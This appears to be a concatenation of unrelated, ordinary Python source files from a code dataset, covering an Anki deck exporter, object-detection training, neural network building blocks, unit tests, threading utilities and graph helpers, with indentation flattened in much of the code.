json_exporter: AnkiJsonExporter = None,
notifier: Notifier = None):
self.includeMedia = True
self.did = deck_id
self.count = 0 # Todo?
self.collection = collection
self.anki_json_exporter = json_exporter or AnkiJsonExporter(collection, ConfigSettings.get_instance())
self.notifier = notifier or AnkiModalNotifier()
# required by anki exporting interface with its non-PEP-8 names
# noinspection PyPep8Naming
def exportInto(self, directory_path):
if self.did is None:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki export works only for specific decks. "
"Please use CrowdAnki snapshot if you want to export "
"the whole collection.")
return
deck = AnkiDeck(self.collection.decks.get(self.did, default=False))
if deck.is_dynamic:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki does not support export for dynamic decks.")
return
# Clean up duplicate note models. See
# https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids.
disambiguate_note_model_uuids(self.collection)
# .parent because we receive name with random numbers at the end (hacking around internals of Anki) :(
export_path = Path(directory_path).parent
self.anki_json_exporter.export_to_directory(deck, export_path, self.includeMedia,
create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)
self.count = self.anki_json_exporter.last_exported_count
def get_exporter_id(exporter):
return f"{exporter.key} (*{exporter.ext})", exporter
def exporters_hook(exporters_list):
exporter_id = get_exporter_id(AnkiJsonExporterWrapper)
if exporter_id not in exporters_list:
exporters_list.append(exporter_id)
|
16719
|
import numpy as np
import tensorflow as tf
from keras import backend as K
from tqdm import tqdm
def write_log(callback, names, logs, batch_no):
for name, value in zip(names, logs):
summary = tf.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value
summary_value.tag = name
callback.writer.add_summary(summary, batch_no)
callback.writer.flush()
def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper):
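    # One epoch of two-stage training: the RPN predicts proposals, which are
    # decoded against the anchors by bbox_util.detection_out_rpn; roi_helper.calc_iou
    # converts them into classification/regression targets for the ROI head, and
    # model_all is then trained jointly on the RPN and detection losses.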
total_loss = 0
rpn_loc_loss = 0
rpn_cls_loss = 0
roi_loc_loss = 0
roi_cls_loss = 0
val_loss = 0
with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_step:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration)
rpn_cls_loss += loss_class[1]
rpn_loc_loss += loss_class[2]
roi_cls_loss += loss_class[3]
roi_loc_loss += loss_class[4]
total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss
pbar.set_postfix(**{'total' : total_loss / (iteration + 1),
'rpn_cls' : rpn_cls_loss / (iteration + 1),
'rpn_loc' : rpn_loc_loss / (iteration + 1),
'roi_cls' : roi_cls_loss / (iteration + 1),
'roi_loc' : roi_loc_loss / (iteration + 1),
'lr' : K.get_value(model_rpn.optimizer.lr)})
pbar.update(1)
print('Start Validation')
with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen_val):
if iteration >= epoch_step_val:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
val_loss += loss_class[0]
pbar.set_postfix(**{'total' : val_loss / (iteration + 1)})
pbar.update(1)
logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val}
loss_history.on_epoch_end([], logs)
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))
model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
|
16750
|
class Solution:
def subtractProductAndSum(self, n: int) -> int:
x = n
add = 0
mul = 1
while x > 0 :
add += x%10
mul *= x%10
x = x//10
return mul - add
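if __name__ == "__main__":
    # Quick check (not part of the original submission): the digits of 234 give
    # 2*3*4 - (2+3+4) = 24 - 9 = 15.
    assert Solution().subtractProductAndSum(234) == 15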
|
16756
|
from typing import Tuple
import torch
class RunningMeanStd:
"""
Utility Function to compute a running mean and variance calculator
:param epsilon: Small number to prevent division by zero for calculations
:param shape: Shape of the RMS object
:type epsilon: float
:type shape: Tuple
"""
def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()):
self.mean = torch.zeros(shape).double()
self.var = torch.ones(shape).double()
self.count = epsilon
def update(self, batch: torch.Tensor):
batch_mean = torch.mean(batch, axis=0)
batch_var = torch.var(batch, axis=0)
batch_count = batch.shape[0]
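        # Merge the batch statistics into the running statistics using a
        # parallel (Chan et al.) mean/variance combination.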
total_count = self.count + batch_count
delta = batch_mean - self.mean
new_mean = self.mean + delta * batch_count / total_count
M2 = (
self.var * self.count
+ batch_var * batch_count
+ (delta ** 2) * self.count * batch_count / total_count
)
self.mean = new_mean
self.var = M2 / (total_count - 1)
self.count = total_count
|
16796
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
    # the same as https://github.com/facebook/fb.resnet.torch#notes, slightly different from the original paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
    # the same as https://github.com/facebook/fb.resnet.torch#notes, slightly different from the original paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
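    # Residual Inception-style unit (in the spirit of Inception-ResNet's
    # block17): two towers are concatenated, projected back to the input
    # channel count, scaled by `scale`, and added to the input.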
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
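# Usage sketch (illustrative; assumes config.net_block has been set, e.g. to 'resnet',
# and that data is an mx.sym symbol):
#   body = conv_block(data, num_filter=64, stride=(1, 1), dim_match=True,
#                     name='stage1_unit1', binarize=False, dcn=False, dilate=1)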
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0]
|
16807
|
import unittest
import pycqed as pq
import os
import matplotlib.pyplot as plt
from pycqed.analysis_v2 import measurement_analysis as ma
class Test_SimpleAnalysis(unittest.TestCase):
    @classmethod
    def tearDownClass(cls):
        plt.close('all')
    @classmethod
    def setUpClass(cls):
        cls.datadir = os.path.join(pq.__path__[0], 'tests', 'test_data')
        ma.a_tools.datadir = cls.datadir
def test_1D_analysis_multi_file(self):
a = ma.Basic1DAnalysis(t_start='20170726_164507',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_1D_analysis_single_file(self):
# giving only a single file
a = ma.Basic1DAnalysis(t_start='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertEqual(a.timestamps, ['20170726_164845'])
def test_2D_analysis_multi_file(self):
# N.B. by setting x2, x2_label and x2_unit in the options dict
# the values can be plotted versus the varied parameter between
# the linecuts
a = ma.Basic2DAnalysis(t_start='20170726_164521',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_2D_interpolated(self):
        a = ma.Basic2DInterpolatedAnalysis(t_start='20180522_030206')
fig_keys = list(a.figs.keys())
exp_list_keys = ['Cost function value', 'Conditional phase',
'offset difference']
self.assertEqual(fig_keys, exp_list_keys)
@unittest.skip('FIXME: disabled, see PR #643')
def test_1D_binned_analysis(self):
a=ma.Basic1DBinnedAnalysis(label='120543_Single_qubit_GST_QL')
|
16824
|
import logging
from queue import Queue
from threading import Thread
from time import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class Worker(Thread):
def __init__(self, queue, out_que):
Thread.__init__(self)
self.queue = queue
self.out_que = out_que
def run(self):
while True:
# Get the work from the queue and expand the tuple
video, txnId = self.queue.get()
try:
v = video.generate_video_part(txnId)
self.out_que.put(v)
finally:
self.queue.task_done()
def main(video_obj_arr, txnId, n):
ts = time()
# Create a queue to communicate with the worker threads
queue = Queue()
out_que = Queue()
    # Create 2 worker threads
    for _ in range(2):
worker = Worker(queue, out_que)
# Setting daemon to True will let the main thread exit even though the workers are blocking
worker.daemon = True
worker.start()
# Put the tasks into the queue as a tuple
for i in range(1, n):
logger.info('Queueing {}'.format(i))
queue.put((video_obj_arr[i-1], txnId))
# Causes the main thread to wait for the queue to finish processing all the tasks
queue.join()
    logger.info('Took %s', time() - ts)
return out_que
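# Usage sketch (video_objects and txn_id are hypothetical; any objects exposing
# generate_video_part(txnId) would work):
#   parts_queue = main(video_objects, txn_id, len(video_objects) + 1)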
if __name__ == '__main__':
    # main() requires (video_obj_arr, txnId, n); calling it with no arguments
    # would raise a TypeError, so nothing runs when this module is executed directly.
    pass
|
16833
|
from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
The following is a brief introduction of the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
Our run_downstream.py and downstream/runner.py follows the first usage
"""
return _UpstreamExpert(*args, **kwargs)
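# A minimal sketch of the expert module this entry point expects (illustrative only,
# not the real upstream/example/expert.py; the interface assumed here is a list of
# waveform tensors in, a dict with "hidden_states" out):
#
#   import torch
#
#   class UpstreamExpert(torch.nn.Module):
#       def __init__(self, ckpt, model_config=None, **kwargs):
#           super().__init__()
#           self.proj = torch.nn.Linear(1, 8)  # placeholder feature extractor
#
#       def forward(self, wavs):
#           # wavs: list of 1-D waveform tensors of varying lengths
#           feats = [self.proj(wav.unsqueeze(-1)) for wav in wavs]
#           return {"hidden_states": feats}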
|
16837
|
from __future__ import annotations
from typing import Any, Dict, Optional
from boa3.model.method import Method
from boa3.model.property import Property
from boa3.model.type.classes.classarraytype import ClassArrayType
from boa3.model.variable import Variable
class OracleType(ClassArrayType):
"""
A class used to represent Oracle class
"""
def __init__(self):
super().__init__('Oracle')
self._variables: Dict[str, Variable] = {}
self._class_methods: Dict[str, Method] = {}
self._constructor: Method = None
@property
def instance_variables(self) -> Dict[str, Variable]:
return self._variables.copy()
@property
def class_variables(self) -> Dict[str, Variable]:
return {}
@property
def properties(self) -> Dict[str, Property]:
return {}
@property
def static_methods(self) -> Dict[str, Method]:
return {}
@property
def class_methods(self) -> Dict[str, Method]:
# avoid recursive import
from boa3.model.builtin.interop.oracle.oraclegetpricemethod import OracleGetPriceMethod
from boa3.model.builtin.interop.oracle.oraclerequestmethod import OracleRequestMethod
if len(self._class_methods) == 0:
self._class_methods = {
'get_price': OracleGetPriceMethod(),
'request': OracleRequestMethod()
}
return self._class_methods
@property
def instance_methods(self) -> Dict[str, Method]:
return {}
def constructor_method(self) -> Optional[Method]:
return self._constructor
@classmethod
def build(cls, value: Any = None) -> OracleType:
if value is None or cls._is_type_of(value):
return _Oracle
@classmethod
def _is_type_of(cls, value: Any):
return isinstance(value, OracleType)
_Oracle = OracleType()
|
16852
|
from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
|
16854
|
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def node_match(n1, n2):
if n1['op'] == n2['op']:
return True
else:
return False
def edge_match(e1, e2):
return True
def gen_graph(adj, ops):
G = nx.DiGraph()
for k, op in enumerate(ops):
G.add_node(k, op=op)
assert adj.shape[0] == adj.shape[1] == len(ops)
for row in range(len(ops)):
for col in range(row + 1, len(ops)):
if adj[row, col] > 0:
G.add_edge(row, col)
return G
def preprocess_adj_op(adj, op):
def counting_trailing_false(l):
count = 0
for TF in l[-1::-1]:
if TF:
break
else:
count += 1
return count
def transform_op(op):
idx2op = {0:'input', 1:'conv1x1-bn-relu', 2:'conv3x3-bn-relu', 3:'maxpool3x3', 4:'output'}
return [idx2op[idx] for idx in op.argmax(axis=1)]
adj = np.array(adj).astype(int)
op = np.array(op).astype(int)
assert op.shape[0] == adj.shape[0] == adj.shape[1]
    # count trailing all-zero columns of adj
    adj_zero_col = counting_trailing_false(adj.any(axis=0))
    # count trailing all-zero rows of adj
    adj_zero_row = counting_trailing_false(adj.any(axis=1))
    # count trailing all-zero rows of op
    op_zero_row = counting_trailing_false(op.any(axis=1))
    assert adj_zero_col == op_zero_row == adj_zero_row - 1, 'Inconsistent result {}={}={}'.format(adj_zero_col, op_zero_row, adj_zero_row - 1)
N = op.shape[0] - adj_zero_col
adj = adj[:N, :N]
op = op[:N]
return adj, transform_op(op)
if __name__ == '__main__':
adj1 = np.array([[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op1 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out']
adj2 = np.array([[0, 1, 1, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op2 = ['in', 'conv1x1', 'mp3x3', 'conv3x3', 'out']
